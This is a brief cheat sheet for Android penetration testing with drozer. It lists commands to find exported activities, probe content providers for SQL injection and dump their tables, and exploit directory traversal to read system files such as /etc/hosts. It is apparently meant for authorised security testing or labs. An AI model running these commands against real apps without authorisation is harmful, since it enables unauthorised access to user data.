[Terminal] Start a drozer session
open drozer-agent application inside android emulator, toggle it on.
2. open Terminal inside linux host machine, type the following to establish communication between drozer and drozer-agent.
adb forward tcp:31415 tcp:31415
3. open Terminal inside windows host machine, type the following to start drozer.
drozer console connect
[Drozer] Find the package name of the vulnerable application
run app.package.list -f <string>
[Drozer] Show package information
run app.package.info -a <package_name>
[Drozer] Identify attack surface
run app.package.attacksurface <package_name>
[Drozer] Exploit exported activities
List exported activities
run app.activity.info -a <package_name>
Invoke exported activities
run app.activity.start -a <package_name> <exported_activity_name>
[Drozer] Exploit exported content providers
Find accessible content URIs
run scanner.provider.finduris -a <package_name>
SQLi vulnerability
List accessible SQLi injection points and accessible content URIs.
run scanner.provider.injection -a <package_name>
Display SQL tables for the package name if it is vulnerable to SQLi.
run scanner.provider.sqltables -a <package_name>
[CRUD] query the content.
[CRUD] insert the content.
[CRUD] update the content.
[CRUD] delete the content.
Directory traversal vulnerability
List accessible content URIs that is vulnerable to directory traversal.
run scanner.provider.traversal -a <package_name>
Exploit directory traversal vulnerability.
run app.provider.read <content_uri>../../etc/hosts
run app.provider.read <content_uri>../../proc/cpuinfo
